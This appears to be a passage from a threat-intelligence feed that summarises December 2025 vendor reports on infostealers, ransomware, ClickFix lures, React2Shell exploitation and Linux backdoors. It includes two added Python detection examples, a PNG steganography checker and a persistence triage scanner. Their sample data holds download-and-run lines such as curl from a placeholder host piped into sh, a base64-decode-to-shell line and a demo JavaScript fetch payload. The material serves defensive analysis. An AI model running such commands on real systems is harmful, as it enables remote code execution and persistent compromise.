MEDIUM
Summary:
Researchers from Sophos have uncovered a campaign that leverages fake “ClickFix” human-verification prompts to trick users into executing a malicious script, ultimately leading to infostealer infection and ransomware deployment. The attack begins on a compromised but legitimate website that delivers a malicious script and presents a highly convincing verification workflow. When users follow the on-screen instructions, a legitimate remote access tool is installed and then abused to establish remote control of the system. From this foothold, the attackers deploy additional payloads, including the StealC V2 infostealer via DLL sideloading, followed by Qilin ransomware, showing that the intrusion escalated from initial access to ransomware deployment. Stolen credentials were also used to access VPN devices, suggesting that the infostealer-derived access was likely sold or handed off to a Qilin affiliate.
Source: https://www.sophos.com/en-us/blog/i-am-not-a-robot-clickfix-used-to-deploy-stealc-and-qilin
2025-12-19
Phantom_Information_Stealer
MEDIUM
Intel Source:
K7 Labs
Intel Name:
Phantom_Information_Stealer
Date of Scan:
2025-12-19
Impact:
MEDIUM
Summary:
Researchers at K7 Labs have identified Phantom 3.5, a .NET-based information-stealing malware distributed via a trojanized “Adobe 1.17.7” installer hosted on cracked software sites. The installer initiates a PowerShell-based multi-stage infection chain that decrypts and loads additional .NET components entirely in memory. A loader component, tracked as BLACKHAX, performs process injection by hijacking an Agent_Compiler executable and injecting the final stealer payload into selected processes. The malware uses RC4-encrypted payloads, in-memory .NET assembly loading, and process hollowing to make detection harder. Once established, Phantom 3.5 establishes persistence through registry run keys and scheduled tasks and conducts environment checks to evade sandboxing and security controls. The stealer is capable of harvesting browser data, credentials, cookies, autofill and credit card information, files, desktop and browser-based wallets, clipboard contents, system information, and stored Wi-Fi passwords. It also includes keylogging functionality and can extract credentials from multiple applications, including browsers, email clients, file-transfer tools, and other local credential stores. For data exfiltration, the malware packages stolen information and transmits it via SMTP as well as alternative channels such as FTP, Discord, and Telegram.
Source: https://labs.k7computing.com/index.php/phantom-3-5-initial-vector-analysis-forensics/
2025-12-19
Malicious_Domain_Parking_Ecosystem
HIGH
Intel Source:
Infoblox
Intel Name:
Malicious_Domain_Parking_Ecosystem
Date of Scan:
2025-12-19
Impact:
HIGH
Summary:
Researchers at Infoblox Threat Intel have identified a widespread abuse of the domain parking and direct search advertising ecosystem, where cyber actors monetize mistyped or abandoned domains to deliver malicious content and redirect users to harmful destinations. The investigation revealed that parked and lookalike domains, traditionally considered benign, are increasingly being leveraged as part of sophisticated malvertising and traffic distribution operations. Threat actors use advanced techniques such as DNS fast flux, GeoIP-based fingerprinting, and selective redirection to evade detection and deliver payloads including information stealers, spyware, and trojans through advertising networks. These operations are supported by large domain portfolios that impersonate major brands and exploit user errors in DNS resolution or browser navigation. The malicious ecosystem involves multiple intermediaries, including advertisers and traffic brokers, who resell visitor data and redirect chains to malware delivery systems. This convergence of legitimate ad infrastructure and malicious manipulation blurs attribution and complicates mitigation.
Source: https://blogs.infoblox.com/threat-intelligence/parked-domains-become-weapons-with-direct-search-advertising/
2025-12-19
RansomHouse_RaaS_Operation
HIGH
Intel Source:
Unit42
Intel Name:
RansomHouse_RaaS_Operation
Date of Scan:
2025-12-19
Impact:
HIGH
Summary:
Researchers at Unit 42 have identified a new ransomware-as-a-service (RaaS) operation known as RansomHouse, attributed to a threat group they track as Jolly Scorpius, which primarily targets VMware ESXi environments. The group employs a double-extortion model, combining large-scale data theft with encryption and threats to leak or sell stolen data. Activity on its data-leak site indicates a growing focus on high-value organizations across healthcare, finance, transportation, and government sectors, reflecting an emphasis on victims holding sensitive and monetizable information. RansomHouse leverages a modular toolset, including MrAgent, an ESXi management and deployment utility that maintains persistent C2 access, collects host and network details, and can disable the ESXi firewall, and Mario, a hypervisor-level ransomware payload that encrypts virtualization-related files across multiple virtual machines, drops ransom notes, and reports detailed encryption statistics.
Source: https://unit42.paloaltonetworks.com/ransomhouse-encryption-upgrade/
2025-12-19
UAT_9686_Targeting_Cisco_AsyncOS_Software
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
UAT_9686_Targeting_Cisco_AsyncOS_Software
Date of Scan:
2025-12-19
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos have identified an ongoing cyber-espionage campaign targeting Cisco AsyncOS appliances used by Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. The activity, tracked as UAT-9686 and assessed with moderate confidence to be linked to a China-aligned APT, has been active since at least late November 2025. After gaining initial access, the attackers deploy a custom backdoor called AquaShell, which is embedded within an existing Python-based web server file and enables unauthenticated remote command execution via crafted web requests. The campaign also employs tunneling tools to maintain persistent access to attacker-controlled infrastructure, including reverse-SSH–like functionality and generic TCP/UDP tunneling. To evade detection, the attackers use a log-cleaning utility known as AquaPurge to remove evidence of their activity from system logs.
Source: https://blog.talosintelligence.com/uat-9686/
2025-12-18
DarkGate_ClickFix_Social_Engineering_Chain
HIGH
Intel Source:
Point Wild
Intel Name:
DarkGate_ClickFix_Social_Engineering_Chain
Date of Scan:
2025-12-18
Impact:
HIGH
Summary:
Researchers at Point Wild’s Lat61 Threat Intelligence Team have identified a sophisticated infection chain leveraging a technique dubbed ClickFix to deliver the DarkGate malware. This campaign exploits human behavior rather than software vulnerabilities, deceiving users into executing PowerShell commands under the guise of troubleshooting or browser extension fixes. The attack sequence involves multilayered scripts hidden within HTML content that decode and execute PowerShell payloads, leading to the retrieval of additional components. These payloads are designed to establish remote access, deploy secondary binaries, and enable full system compromise. The operation demonstrates advanced evasion tactics, including script obfuscation, Base64 encoding, and the use of legitimate scripting frameworks to disguise malicious intent.
Source: https://www.pointwild.com/threat-intelligence/clickfix-darkgate
2025-12-18
GhostPoster_Malware_Hiding_in_Firefox_Extensions
HIGH
Intel Source:
Koi Research
Intel Name:
GhostPoster_Malware_Hiding_in_Firefox_Extensions
Date of Scan:
2025-12-18
Impact:
HIGH
Summary:
Researchers at Koi Research have uncovered GhostPoster, a coordinated malicious campaign abusing Firefox browser extensions to deliver multi-stage malware through PNG image steganography. The campaign centered on a rogue free VPN extension active since September 2025 and 16 related add-ons that together amassed over 50,000 installs. The extensions hid JavaScript payloads inside image logo files, extracting a loader at runtime that contacted external command-and-control infrastructure to fetch encrypted payloads executed in memory. This enabled monetization-focused activity such as affiliate hijacking, browser security header stripping, tracking injection, CAPTCHA bypass, and hidden iframe insertion for click fraud, while evading detection through delayed activation, randomized check-ins, XOR encryption, and runtime-only execution.
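Both the Cyble loader entry above (malicious code hidden in image files) and GhostPoster (a JavaScript loader in extension logo PNGs) rely on an image that still renders while carrying a payload. As an added example that is not Koi Research's or Cyble's code, the block below walks a PNG's chunk structure and reports the places such a payload can sit: bytes appended after IEND, oversized ancillary chunks, script-like text chunks, and chunks whose CRC does not match. The embedded image, the payload string and the single-byte XOR key are constructed for the demo; neither report states how the real payloads were keyed, so the brute-force step is an illustration of the recovery approach, not a decoder for either campaign.

```python
"""Added example (not Koi Research's or Cyble's code): PNG chunk walker that reports
where a payload can hide without breaking the image, plus a single-byte XOR recovery
for trailing data. The image, 'payload' and key below are constructed for the demo.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
SCRIPT_MARKERS = (b"function", b"eval(", b"atob(", b"XMLHttpRequest", b"fetch(")
LARGE_ANCILLARY = 4096  # bytes; metadata chunks larger than this deserve a look


def walk_png(data: bytes) -> dict:
    """Parse chunks up to IEND; return chunk list, findings and any trailing bytes."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    pos, chunks, findings = len(PNG_SIGNATURE), [], []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)   # PNG is big-endian
        name = ctype.decode("latin-1")
        if pos + 12 + length > len(data):
            findings.append(f"truncated {name} chunk at offset {pos}")
            return {"chunks": chunks, "findings": findings, "trailing": b""}
        body = data[pos + 8:pos + 8 + length]
        crc, = struct.unpack_from(">I", data, pos + 8 + length)
        chunks.append((name, length))
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            findings.append(f"bad CRC on {name} chunk at offset {pos}")
        ancillary = bool(ctype[0] & 0x20)            # lowercase first letter = ancillary
        if ancillary and length > LARGE_ANCILLARY:
            findings.append(f"large ancillary chunk {name} ({length} bytes)")
        # tEXt is plain; zTXt/iTXt bodies may be zlib-compressed and need inflating first
        if name == "tEXt" and any(m in body for m in SCRIPT_MARKERS):
            findings.append("script-like content in tEXt chunk")
        pos += 12 + length
        if name == "IEND":
            break
    trailing = data[pos:]                            # decoders stop at IEND and ignore this
    if trailing:
        findings.append(f"{len(trailing)} bytes appended after IEND")
    return {"chunks": chunks, "findings": findings, "trailing": trailing}


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def recover_xor_payload(blob: bytes, markers=SCRIPT_MARKERS):
    """Try every single-byte XOR key; return (key, text) when the result is printable
    ASCII containing a script marker, else None. Assumes a single-byte key."""
    for key in range(256):
        candidate = xor_bytes(blob, key)
        if (all(32 <= b < 127 or b in (9, 10, 13) for b in candidate)
                and any(m in candidate for m in markers)):
            return key, candidate.decode("ascii")
    return None


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


# Constructed 1x1 RGB image; the payload is a placeholder, not code from either campaign.
CLEAN_PNG = (PNG_SIGNATURE
             + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
             + _chunk(b"IDAT", zlib.compress(b"\x00\xff\x00\x00"))
             + _chunk(b"IEND", b""))
DEMO_KEY = 0x5A
DEMO_PAYLOAD = b'(function(){fetch("https://example.invalid/c");})();'
STEGO_PNG = CLEAN_PNG + xor_bytes(DEMO_PAYLOAD, DEMO_KEY)

if __name__ == "__main__":
    report = walk_png(STEGO_PNG)
    print(report["chunks"], report["findings"])
    print(recover_xor_payload(report["trailing"]))
```

Run `walk_png` over every image shipped in an extension or installer package and treat any non-empty `findings` as a reason to look at the code that reads the file at runtime, since a payload inside a valid chunk needs loader code to fetch and decode it.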
Source: https://www.koi.ai/blog/inside-ghostposter-how-a-png-icon-infected-50-000-firefox-browser-users#heading-9
2025-12-18
ForumTroll_Academic_Phishing_Campaign
MEDIUM
Intel Source:
Securelist
Intel Name:
ForumTroll_Academic_Phishing_Campaign
Date of Scan:
2025-12-18
Impact:
MEDIUM
Summary:
Researchers at Kaspersky’s Global Research and Analysis Team (GReAT) have identified a renewed cyber-espionage campaign conducted by the ForumTroll APT group, targeting political scientists and academics in Russia. The operation represents a continuation of the group’s earlier 2025 activities but with a shift from exploiting browser vulnerabilities to using highly tailored phishing emails. These emails impersonated a well-known Russian electronic library and were crafted to appear as plagiarism notifications, deceiving recipients into downloading malicious archives. Each archive contained a shortcut file that executed a PowerShell script designed to retrieve and install a secondary payload, ultimately delivering a remote access framework known as Tuoni. The attackers employed COM hijacking for persistence and relied on cloud-based content delivery infrastructure for command-and-control communication, demonstrating technical competence and operational discipline.
Source: https://securelist.com/operation-forumtroll-new-targeted-campaign/118492/
2025-12-17
PyStoreRAT_Targets_OSINT_Users_via_GitHub
HIGH
Intel Source:
Morphisec and Hackread
Intel Name:
PyStoreRAT_Targets_OSINT_Users_via_GitHub
Date of Scan:
2025-12-17
Impact:
HIGH
Summary:
Researchers at Morphisec and Hackread have identified PyStoreRAT, an AI-enabled supply chain malware campaign that abuses GitHub to distribute trojanized open-source repositories. The operators reactivate dormant accounts and publish realistic, AI-generated projects such as OSINT tools, DeFi bots, and GPT-related utilities, which later receive update commits that introduce a JavaScript or HTA backdoor. PyStoreRAT operates as a flexible loader capable of system profiling, payload delivery, adaptive execution based on the presence of endpoint security products, self-propagation via removable media, and modular expansion through externally delivered updates. Its rotating command-and-control architecture provides persistence and redundancy across environments, and Russian-language strings in the code suggest mixed targeting. Overall, the campaign reflects an evolution in AI-assisted social engineering that exploits trust in open-source ecosystems. Additional coverage: https://hackread.com/pystorerat-rat-malware-github-osint-researchers/
Source: https://www.morphisec.com/blog/pystorerat-a-new-ai-driven-supply-chain-malware-campaign-targeting-it-osint-professionals/
2025-12-17
UDPGangster_Backdoor
MEDIUM
Intel Source:
Polyswarm
Intel Name:
UDPGangster_Backdoor
Date of Scan:
2025-12-17
Impact:
MEDIUM
Summary:
Researchers at PolySwarm have identified UDPGangster, a UDP-based backdoor linked to the Iranian state-aligned MuddyWater threat actor, actively used in targeted phishing campaigns against users in Turkey, Israel, and Azerbaijan. The malware is delivered via phishing emails that impersonate official government entities and include macro-enabled Microsoft Word documents. When recipients enable macros, embedded VBA code silently drops and executes the payload while displaying a benign decoy image to avoid arousing suspicion. Once installed, UDPGangster provides attackers with remote access over UDP, enabling command execution, file exfiltration, and deployment of additional payloads while bypassing many traditional network defenses that primarily monitor TCP traffic. The malware also establishes persistence on the infected system and employs extensive anti-analysis and anti-sandbox techniques, including virtual machine detection, hardware and memory checks, debugger detection, and scans for analysis tools, ensuring it primarily executes on real victim environments.
Source: https://blog.polyswarm.io/muddywaters-udpgangster-backdoor
2025-12-17
Rust_Malware_Analysis_Techniques_Sample_Breakdown
LOW
Intel Source:
Binary Defense
Intel Name:
Rust_Malware_Analysis_Techniques_Sample_Breakdown
Date of Scan:
2025-12-17
Impact:
LOW
Summary:
Binary Defense provides a technical walkthrough of methods for analyzing malware written in the Rust programming language, focusing on compiler behavior, embedded strings, build artifacts, and techniques for recovering entry points in unknown Rust binaries. The report explains how Rust’s lack of a stable ABI, extensive compiler-inserted safety checks, and dependency embedding introduce analytical challenges for defenders. It then demonstrates these techniques on a single unknown Rust sample, revealing its use of HTTP libraries and common Rust runtime initialization patterns but without attributing it to any threat actor or campaign. The report highlights that Rust-based malware is becoming more prevalent due to its cross-platform capabilities and lower detection rates compared to traditional languages. The content is intended to improve analyst proficiency rather than describe an active intrusion or actor behaviors.
Source: https://binarydefense.com/resources/blog/digging-through-rust-to-find-gold-extracting-secrets-from-rust-malware
2025-12-17
Gentlemen_Ransomware_Global_Dual_Extortion_Surge
HIGH
Intel Source:
ASEC
Intel Name:
Gentlemen_Ransomware_Global_Dual_Extortion_Surge
Date of Scan:
2025-12-17
Impact:
HIGH
Summary:
Researchers at ASEC have identified a new ransomware group known as Gentlemen, first observed in August 2025. The group employs a double extortion model, breaching enterprise networks to exfiltrate and encrypt sensitive data before using it for leverage against victims. Written in the Go programming language, the ransomware demonstrates a high level of sophistication through features such as disabling security services, halting backup and database processes, and leveraging Group Policy Object (GPO) manipulation during lateral movement. Execution is restricted via a password argument to prevent analysis in unintended environments, indicating strong operational discipline.
Source: https://asec.ahnlab.com/en/91545/
2025-12-16
BlackForce_Phishing_Kit
HIGH
Intel Source:
Zscaler
Intel Name:
BlackForce_Phishing_Kit
Date of Scan:
2025-12-16
Impact:
HIGH
Summary:
Researchers at Zscaler have identified BlackForce, a commercial phishing kit designed to steal login credentials in real time and bypass multi-factor authentication for widely used online services. The kit is sold on underground forums and distributed through phishing pages that closely replicate legitimate brand login screens. When a user clicks a lure link, BlackForce first verifies that the visitor is a real person rather than an automated scanner or security researcher before presenting the fraudulent login page. Victims are prompted to enter their username, password, and, in many cases, a one-time authentication code. This information is immediately transmitted to the attacker, who uses an interactive control panel to inject additional fake prompts into the victim’s browser and replay the captured data on the legitimate service to seize the account. All stolen information is ultimately routed to a backend system that can forward the data to messaging channels for operator use.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-blackforce-phishing-kit
2025-12-16
React2Shell_Multi_Actor_Espionage_Cryptomining
LOW
Intel Source:
Google Threat Intelligence Group
Intel Name:
React2Shell_Multi_Actor_Espionage_Cryptomining
Date of Scan:
2025-12-16
Impact:
LOW
Summary:
Google Threat Intelligence Group (GTIG) reports widespread exploitation of the React2Shell vulnerability (CVE-2025-55182), an unauthenticated RCE flaw in React Server Components used by frameworks such as Next.js. Multiple distinct threat clusters, primarily China-nexus plus at least one Iran-nexus group, are leveraging the bug to deploy tunneling tools, backdoors, and cryptocurrency miners. China-linked cluster UNC6600 uses the flaw to drop the MINOCAT tunneler, gaining persistent covert access to Linux hosts through cron, systemd services, and shell configuration injection. Another China-nexus cluster, UNC6586, deploys the SNOWLIGHT downloader component of the VSHELL backdoor framework, using staged HTTP retrieval of additional payloads disguised as benign files. UNC6588 uses the same vulnerability to distribute the COMPOOD backdoor masquerading as common tools such as Vim, while UNC6603 deploys an updated HISONIC backdoor that hides its configuration behind mainstream cloud services. Cluster UNC6595 installs ANGRYREBEL.LINUX, disguising it as the system’s SSH daemon and applying timestomping and shell history clearing for anti-forensics. In parallel, financially motivated actors rapidly weaponize the vulnerability to install XMRig miners, establishing persistence through new systemd services. Overall, CVE-2025-55182 is enabling both espionage and profit-driven activity against unpatched React/Next.js workloads at global scale.
Source: https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182
2025-12-15
PeerBlight_Linux_Backdoor
MEDIUM
Intel Source:
Huntress
Intel Name:
PeerBlight_Linux_Backdoor
Date of Scan:
2025-12-15
Impact:
MEDIUM
Summary:
Researchers at Huntress have discovered that threat actors are exploiting a critical vulnerability in React Server Components to achieve remote code execution on internet-facing applications, then deploy a newly identified Linux backdoor, dubbed PeerBlight, alongside cryptocurrency mining payloads. PeerBlight enables persistent remote access and supports command execution, file manipulation, and tunneling, allowing attackers to maintain full control of compromised servers long after the initial intrusion. After gaining access, the attackers establish new services and disguise malicious processes to ensure persistence. They also deploy auxiliary tooling that facilitates reverse proxying, SOCKS tunneling, and unauthorized user account creation, enabling long-term footholds in victim environments. PeerBlight’s command-and-control channel features encrypted communications, a domain generation algorithm, and a peer-to-peer fallback layer built on BitTorrent DHT. This multi-layered design significantly increases the resilience of the attacker’s infrastructure against traditional blocking or domain takedown efforts.
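The GTIG and Huntress entries above describe the same post-exploitation pattern on Linux: persistence through cron, new systemd services and shell configuration, binaries masquerading as sshd, and timestomping. As an added example that is not GTIG's or Huntress's code, the block below implements small triage checks for each of those: a line scanner for crontabs, unit files and rc files, an ExecStart check for daemon names started from untrusted paths, and an mtime-versus-ctime check that catches the common form of timestomping. The crontab, unit and rc text are constructed samples, and the path and pattern heuristics are assumptions chosen for the demo, not indicators from either report.

```python
"""Added example, not GTIG's or Huntress's code: triage checks for the Linux persistence
and anti-forensics described in the React2Shell entries. Samples are constructed;
the heuristics are assumptions for the demo, not indicators from either report.
"""
import os
import posixpath
import re
import tempfile
import time

FETCH_AND_RUN = re.compile(
    r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"      # pipe a download straight into a shell
    r"|\bbase64\s+(?:-d|--decode)\b"            # decode an embedded blob before running it
    r"|\bnohup\b|/dev/tcp/",                    # detach, or bash's built-in TCP socket
    re.I)
ODD_EXEC_PATH = re.compile(r"(?<![\w/])(?:/tmp|/var/tmp|/dev/shm)/\S+")
KNOWN_DAEMONS = {"sshd", "cron", "crond", "rsyslogd", "systemd-resolved"}
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin", "/usr/lib/systemd", "/lib/systemd")


def scan_lines(text: str, source: str) -> list[dict]:
    """Return the non-comment lines of a crontab, unit or rc file that match a heuristic."""
    hits = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if FETCH_AND_RUN.search(line):
            reasons.append("download-and-execute, decoder or detach idiom")
        if ODD_EXEC_PATH.search(line):
            reasons.append("runs from a world-writable path")
        if reasons:
            hits.append({"source": source, "line": number, "text": line, "reasons": reasons})
    return hits


def masquerading_exec(unit_text: str) -> list[str]:
    """ExecStart= binaries that carry a well-known daemon's name outside trusted dirs."""
    out = []
    for line in unit_text.splitlines():
        if line.startswith("ExecStart="):
            exe = line.split("=", 1)[1].split()[0].lstrip("-@+!:")  # strip systemd prefixes
            if posixpath.basename(exe) in KNOWN_DAEMONS and posixpath.dirname(exe) not in TRUSTED_DIRS:
                out.append(exe)
    return out


def timestomp_suspect(path: str, tolerance_s: float = 60.0) -> bool:
    """mtime far older than ctime. utimes()/touch -d can rewrite atime and mtime but not
    ctime, so a 'years old' file whose inode changed recently was either timestomped or
    legitimately copied/installed with a preserved mtime (cp -p, package managers):
    confirm against package metadata before acting on it."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > tolerance_s


def demo_timestomp() -> bool:
    """Create a file, backdate its mtime the way an attacker would, and re-check it."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        a_year_ago = time.time() - 365 * 86400
        os.utime(path, (a_year_ago, a_year_ago))   # sets atime/mtime only; ctime moves to now
        return timestomp_suspect(path)
    finally:
        os.unlink(path)


# Constructed samples (example.invalid is a reserved name, not a real host).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
*/5 * * * * /usr/bin/backup-rotate
@reboot /bin/sh -c 'curl -s http://example.invalid/a.sh | sh'
* * * * * echo aGVsbG8= | base64 -d | sh
"""
SAMPLE_UNIT = """\
[Unit]
Description=OpenSSH server daemon
[Service]
ExecStart=/dev/shm/.x/sshd -D
Restart=always
[Install]
WantedBy=multi-user.target
"""
SAMPLE_BASHRC = """\
alias ll='ls -la'
nohup /tmp/.cache/agent >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for src, text in (("crontab", SAMPLE_CRONTAB), ("unit", SAMPLE_UNIT), ("bashrc", SAMPLE_BASHRC)):
        for hit in scan_lines(text, src):
            print(hit)
    print("masquerading:", masquerading_exec(SAMPLE_UNIT))
    print("timestomp demo:", demo_timestomp())
```

Feed `scan_lines` the contents of /etc/cron*, the per-user crontabs, every unit under /etc/systemd/system, and the rc files of accounts with shells; the ctime check is cheap enough to run over all of /usr/sbin and /usr/bin, after which a package-manager verification (`rpm -V`, `debsums`) separates preserved-mtime installs from tampering.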
Source: https://www.huntress.com/blog/peerblight-linux-backdoor-exploits-react2shell
2025-12-14
CastleRAT
MEDIUM
Intel Source:
Splunk
Intel Name:
CastleRAT
Date of Scan:
2025-12-14
Impact:
MEDIUM
Summary:
Researchers at Splunk have discovered a new remote access trojan (RAT) called CastleRAT, which comes in both Python and C-based versions. It provides attackers extensive control and surveillance capabilities on compromised Windows machines. Once installed, it gathers detailed system information and uses various plugins to capture clipboard data, keystrokes, screenshots, and even audio and video from connected devices. CastleRAT can hijack browser sessions, maintain persistence via rundll32 and scheduled tasks, and bypass UAC by abusing trusted binaries. It employs masquerading techniques and uses “dead drop” locations on legitimate websites to retrieve configuration updates and commands. Altogether, these capabilities make CastleRAT a powerful post-compromise tool that can support credential theft, espionage, and further intrusion once attackers have initial access to a system.
Source: https://www.splunk.com/en_us/blog/security/castlerat-malware-detection-splunk-mitre-attck.html
2025-12-14
Famous_Chollima_DPRK_IT_Worker_Infiltration
HIGH
Intel Source:
Any.Run
Intel Name:
Famous_Chollima_DPRK_IT_Worker_Infiltration
Date of Scan:
2025-12-14
Impact:
HIGH
Summary:
Researchers at ANY.RUN and NorthScan have identified an ongoing campaign by the Lazarus Group’s Famous Chollima division, which infiltrates Western organizations by posing as legitimate freelance IT workers. The operation employs large-scale social engineering through GitHub, LinkedIn, and Telegram, where DPRK operators masquerade as developers or recruiters to gain employment and internal access to company systems. Once trust is established, victims are persuaded to install remote access software, allowing adversaries full control over their systems and sensitive credentials. The investigation, conducted within a controlled sandbox environment, revealed consistent use of commercial VPNs, browser automation extensions, and identity theft tactics to blend malicious activity with legitimate workflows. Targeting primarily the IT, financial, cryptocurrency, e-commerce, and healthcare sectors, the group seeks to generate revenue and facilitate espionage for the North Korean regime.
Source: https://any.run/cybersecurity-blog/lazarus-group-it-workers-investigation/
2025-12-14
Cracking_ValleyRAT
HIGH
Intel Source:
CheckPoint
Intel Name:
Cracking_ValleyRAT
Date of Scan:
2025-12-14
Impact:
HIGH
Summary:
Check Point researchers have uncovered ValleyRAT, a modular Windows backdoor supported by a comprehensive development ecosystem that includes a GUI-based builder, multiple plugins, and a customized kernel-mode rootkit. The builder generates customized ValleyRAT payloads by allowing operators to select capabilities such as remote desktop control, file and process management, credential harvesting, and host monitoring. A central component is the kernel driver, derived from open-source code but extensively modified to conceal the malware, safeguard its user-mode components, and interfere with security tooling. It manipulates process structures, hides operational artifacts, and stores configuration data in the registry in a form that makes analysis difficult.
Source: https://research.checkpoint.com/2025/cracking-valleyrat-from-builder-secrets-to-kernel-rootkits/
2025-12-13
BRAT_Hijacker_Browser_Manipulation_Malware
MEDIUM
Intel Source:
G-DATA
Intel Name:
BRAT_Hijacker_Browser_Manipulation_Malware
Date of Scan:
2025-12-13
Impact:
MEDIUM
Summary:
Researchers at G DATA CyberDefense have identified a series of browser hijacking techniques used by multiple malware families that target Chromium-based browsers and Firefox. The investigation highlights three distinct mechanisms of compromise, revealing how modern hijackers maintain persistence and evade detection. The first technique involves tampering with browser preference files—such as Chrome’s Secure Preferences or Firefox’s prefs.js—to alter default settings like homepage or search engine configurations, bypassing integrity checks through regenerated HMAC values derived from system data. The second, named BRAT (browser remote access tool), demonstrates the use of automated keystroke emulation to remotely control browser interactions, enabling actions such as tab navigation, clipboard exfiltration, and forced redirections. The third technique leverages a combination of PowerShell and VBScript to disable Chrome’s auto-update policy and install unauthorized extensions via deprecated command-line switches, effectively preventing remediation through normal software updates. Collectively, these techniques show a progression from configuration tampering to full browser automation, representing a growing threat vector that blends persistence, user deception, and credential theft potential.
Source: https://www.gdatasoftware.com/blog/2025/11/38298-learning-about-browser-hijacking
2025-12-13
MoneyMount_ISO_Phantom_Stealer_via_ISO_Files
HIGH
Intel Source:
Seqrite Labs
Intel Name:
MoneyMount_ISO_Phantom_Stealer_via_ISO_Files
Date of Scan:
2025-12-13
Impact:
HIGH
Summary:
Researchers at Seqrite Labs have identified an ongoing phishing campaign, dubbed Operation MoneyMount-ISO, that delivers the Phantom Stealer malware through malicious ISO-mounted executables. The campaign, originating from Russia, employs payment-confirmation–themed phishing emails written in Russian and designed to impersonate legitimate financial correspondence. The attached ZIP archive contains an ISO image that mounts automatically and executes a disguised payload, leading to the deployment of Phantom Stealer. Once active, the malware conducts multi-stage data theft operations, including credential extraction from browsers, Discord token harvesting, cryptocurrency wallet exfiltration, and clipboard and keylogging surveillance. Technical analysis indicates that the malware leverages steganography, anti-virtualization checks, and self-deletion routines to evade detection. Data exfiltration is achieved through multiple channels such as Telegram bots, Discord webhooks, and FTP servers, highlighting a sophisticated exfiltration architecture.
Source: https://www.seqrite.com/blog/operation-moneymount-iso-deploying-phantom-stealer-via-iso-mounted-executables/
2025-12-12
React2Shell_RCE_Exploitation_Campaign
HIGH
Intel Source:
Sophos
Intel Name:
React2Shell_RCE_Exploitation_Campaign
Date of Scan:
2025-12-12
Impact:
HIGH
Summary:
Researchers at Sophos Counter Threat Unit (CTU) have identified widespread exploitation of CVE-2025-55182, a critical remote code execution vulnerability in React Server Components, referred to as React2Shell. The flaw stems from unsafe deserialization of network requests in the React “Flight” protocol, allowing attackers to send a single malicious HTTP request to execute arbitrary JavaScript on affected servers without authentication. Exploitation activity has been observed targeting versions 19.0.0 through 19.2.0 of React, with numerous compromised systems deploying multi-stage Linux loaders designed for persistence via cron jobs, systemd, and rc.local. Sophos analysts report that these payloads included obfuscated JavaScript components using AES-256-CBC encryption to conceal follow-on malware and anti-forensic measures to delete installer traces.
Source: https://news.sophos.com/en-us/2025/12/11/react2shell-flaw-cve-2025-55182-exploited-for-remote-code-execution/
2025-12-12
Gogs_RCE_Bypass_Actively_Exploited
HIGH
Intel Source:
WIZ
Intel Name:
Gogs_RCE_Bypass_Actively_Exploited
Date of Scan:
2025-12-12
Impact:
HIGH
Summary:
Researchers at Wiz have identified active exploitation of a previously unknown vulnerability in Gogs, a self-hosted Git service. The flaw, tracked as CVE-2025-8110, is a symbolic link bypass that reopens a remote code execution vector thought to be patched under CVE-2024-55947. The vulnerability allows authenticated users to overwrite files outside the repository directory, enabling arbitrary command execution through modification of Git configuration files. Wiz’s investigation began after detecting malware on a customer’s cloud workload, which was traced to this Gogs zero-day. The threat actor leveraged open registration features and API misuse to compromise exposed instances, with over half of observed Gogs servers showing infection signs.
Source: https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit
2025-12-12
NANOREMOTE_Windows_Backdoor
MEDIUM
Intel Source:
Elastic Security Labs
Intel Name:
NANOREMOTE_Windows_Backdoor
Date of Scan:
2025-12-12
Impact:
MEDIUM
Summary:
Researchers from Elastic Security Labs have uncovered a new Windows backdoor called NANOREMOTE, delivered through a deceptive loader known as WMLOADER, which masquerades as legitimate security software. The developers behind this tool appear to be the same espionage-focused group previously associated with the FINALDRAFT implant, as indicated by overlapping code and shared cryptographic routines. Once deployed, NANOREMOTE provides attackers with extensive remote-access capabilities, including command execution, host reconnaissance, file manipulation, and in-memory execution of additional payloads. Its flexible beaconing and task-based architecture enable sustained, interactive operations. To evade detection, the malware leverages Google Drive and other common cloud services for payload staging and data exfiltration, allowing its traffic to blend seamlessly with legitimate network activity. WMLOADER further enhances stealth by using an invalid code signature and encrypted shellcode to evade basic security controls.
Source: https://www.elastic.co/security-labs/nanoremote
2025-12-12
Fake_AI_Pages_Drop_AMOS_Malware
MEDIUM
Intel Source:
Huntress
Intel Name:
Fake_AI_Pages_Drop_AMOS_Malware
Date of Scan:
2025-12-12
Impact:
MEDIUM
Summary:
